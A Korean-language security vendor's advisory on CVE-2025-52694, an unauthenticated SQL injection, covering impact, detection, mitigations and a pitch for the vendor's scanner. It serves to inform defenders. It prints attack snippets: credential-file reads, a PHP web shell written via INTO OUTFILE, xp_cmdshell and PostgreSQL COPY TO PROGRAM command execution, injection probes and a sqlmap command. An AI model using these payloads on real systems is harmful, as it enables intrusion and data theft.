CVE 치명적 2026년 1월 12일 · 10분 읽기

CVE-2025-52694: 인증되지 않은 SQL 인젝션으로 노출된 서비스에서 임의 명령 실행 가능

인증이 필요하지 않은 SQL 인젝션 취약점으로 인해, 원격 공격자가 취약한 인터넷 노출 서비스에서 임의의 SQL 명령을 실행할 수 있어 데이터의 기밀성, 무결성, 가용성을 위협합니다. CVSS 10.0.


CVSS 10.0 — 치명적
항목세부 내용
CVE IDCVE-2025-52694
심각도치명적(CVSS 3.1: 10.0)
취약점 유형SQL 인젝션(CWE-89)
공개일2026년 1월 12일
인증 필요 여부없음
공격 벡터네트워크(인터넷 노출)

CVE-2025-52694란?

CVE-2025-52694은 인터넷에 노출된 서비스에 존재하는 치명적인 SQL 인젝션 취약점으로, 악용하는 데 인증이 필요하지 않습니다. 공격자는 취약한 서비스의 데이터베이스 쿼리에 임의의 SQL 명령을 직접 삽입할 수 있어, 모든 데이터베이스 콘텐츠를 읽거나 수정할 수 있고 — 데이터베이스 구성에 따라서는 — 기반 서버에서 원격 코드 실행까지 달성할 수 있습니다.

SQL 인젝션은 OWASP Top 10이 처음 만들어질 때부터 포함되어 있었으며, 존재할 경우 여전히 파괴적으로 효과적입니다. 인증되지 않고 네트워크로 접근 가능하며 전체 데이터에 접근할 수 있는 SQL 인젝션은 취약점이 가질 수 있는 가장 위험한 형태입니다 — 그렇기에 CVSS 최고 점수를 받았습니다.

기술적 영향

⚠ CIA 트라이어드 전체 침해

기밀성: 모든 데이터베이스 콘텐츠 읽기 가능 — 사용자명, 비밀번호, 개인정보(PII), API 키, 금융 데이터.
무결성: 데이터 수정, 레코드 삭제, 스키마 변경이 가능합니다.
가용성: 리소스를 고갈시키는 쿼리를 통한 DoS 공격, 데이터 파괴가 가능합니다.

SQL 인젝션에서 RCE로의 상승 경로

확장 기능이 활성화된 데이터베이스에서는 SQL 인젝션이 운영체제 명령 실행으로까지 상승할 수 있습니다:


-- MySQL FILE 권한 이용 — OS 파일 읽기
SELECT LOAD_FILE('/etc/passwd');

-- MySQL INTO OUTFILE 이용 — 웹 셸 작성
SELECT '<?php system($_GET["cmd"]); ?>'
INTO OUTFILE '/var/www/html/shell.php';

-- xp_cmdshell이 활성화된 MSSQL
EXEC xp_cmdshell 'whoami';

-- PostgreSQL large object 삽입
SELECT lo_import('/etc/passwd');
CREATE OR REPLACE FUNCTION cmd(text) RETURNS text AS $$
  DECLARE result text;
  BEGIN
    EXECUTE 'COPY (SELECT '') TO PROGRAM ''' || $1 || '''';
    RETURN result;
  END;
$$ LANGUAGE plpgsql;

영향받는 버전

특정 제품 및 버전 정보는 벤더 권고문을 확인하세요. 영향받는 것으로 명시된 버전 중 인터넷 트래픽에 노출된 것은 모두 활발히 악용 가능한 것으로 간주해야 합니다. 벤더가 제공하는 패치된 버전으로 즉시 업데이트하세요.

탐지 방법

수동 SQL 인젝션 테스트


# 기본 오류 기반 탐지
# 매개변수에 '를 추가하고 오류 응답을 관찰
GET /search?q=test' HTTP/1.1

# 불리언 기반 블라인드 탐지
GET /search?q=test' AND 1=1-- -   # 정상 결과가 반환되어야 함
GET /search?q=test' AND 1=2-- -   # 빈 결과 또는 다른 결과가 반환되어야 함

# 시간 기반 블라인드 탐지(인젝션 확인)
GET /search?q=test'; WAITFOR DELAY '0:0:5'-- -   # MSSQL
GET /search?q=test'; SELECT SLEEP(5)-- -          # MySQL

# SQLMap을 사용한 자동화된 익스플로잇 확인(승인된 테스트 환경에서만)
sqlmap -u "https://target.com/page?id=1" --level=5 --risk=3 --dbs

WAF 로그 검토

SQL 키워드를 포함한 패턴이 있는지 WAF 또는 애플리케이션 로그를 검토하세요(UNION SELECT, OR 1=1, SLEEP(, xp_cmdshell) 등이 요청 매개변수에 있는지 확인하세요. CVE-2025-52694의 실제 악용 시 이러한 패턴이 나타납니다.

🔍 KENSAI 탐지: KENSAI의 SQL Injection Scanner는 오류 기반, 블라인드, 시간 기반, 대역 외(out-of-band) 인젝션 기법을 모두 다룹니다. CVE-2025-52694 인젝션 패턴은 저희 페이로드 라이브러리에 포함되어 있으며, 매개변수, 헤더, JSON/XML 본문 필드를 포함한 모든 입력 벡터에 대해 매칭됩니다.

완화 조치

  1. 벤더 패치 즉시 적용: 벤더 권고문에 명시된 패치 버전으로 업데이트하세요.
  2. 매개변수화된 쿼리: 모든 데이터베이스 쿼리가 매개변수화된 입력을 사용하는 준비된 문(prepared statement)을 사용하도록 하세요 — SQL 인젝션에 대한 유일하게 신뢰할 수 있는 해결책입니다.
  3. 입력 검증: 사용자가 제공하는 모든 입력을 검증하고 정제하여, 불필요한 SQL 메타문자를 거부하세요.
  4. 최소 권한: 데이터베이스 계정은 최소 권한만 가져야 합니다 — 절대 sa 또는 root 데이터베이스 접근 권한을 애플리케이션 계정에서 사용하지 마세요.
  5. WAF 규칙: SQL 인젝션 페이로드를 탐지하고 차단하도록 WAF 규칙을 배포하거나 업데이트하세요 — 이는 보완 통제이지 근본적인 해결책은 아닙니다.
  6. 위험한 저장 프로시저 비활성화: 비활성화 대상: xp_cmdshell 및 기타 OS 수준 데이터베이스 함수 — 명시적으로 필요한 경우가 아니라면 비활성화하세요.
  7. 네트워크 분할: 데이터베이스 서버는 절대 인터넷에서 직접 접근 가능해서는 안 됩니다.

KENSAI 탐지 역량

KENSAI는 CVE-2025-52694를 포함한 포괄적인 SQL 인젝션 탐지를 제공합니다:

귀하의 스택에 SQL 인젝션이 있습니까?

KENSAI는 귀하의 전체 웹 애플리케이션 공격 표면을 스캔해 SQL 인젝션과 200개 이상의 다른 치명적인 취약점을 찾아냅니다. SQL 인젝션이 침해로 이어지지 않도록 하세요.

SQL 인젝션 무료 스캔하기

KENSAI Security Research Team 작성 · 더 많은 CVE 분석

관련 기사

6G 보안 내재화 가이드라인 발표, AI 내부자 리스크 위험 수준 도달, 엔터프라이즈 제로데이 사상 최고치 경신 — 보안 규제 라운드업 Ruflo, Claude 네이티브 에이전트 오케스트레이션으로 2만 8천 스타 달성 — SuperMemory AI, 에이전트 메모리 재정의 — Chrome DevTools MCP 공식화 — ByteDance DeerFlow 5만 3천 스타 — Oh-My-ClaudeCode, 팀 에이전트 도입 Microsoft 긴급 RRAS 핫패치, AppsFlyer SDK 공급망 탈취, Chrome 제로데이 2건 패치, 중국 APT 동남아 군사 기관 표적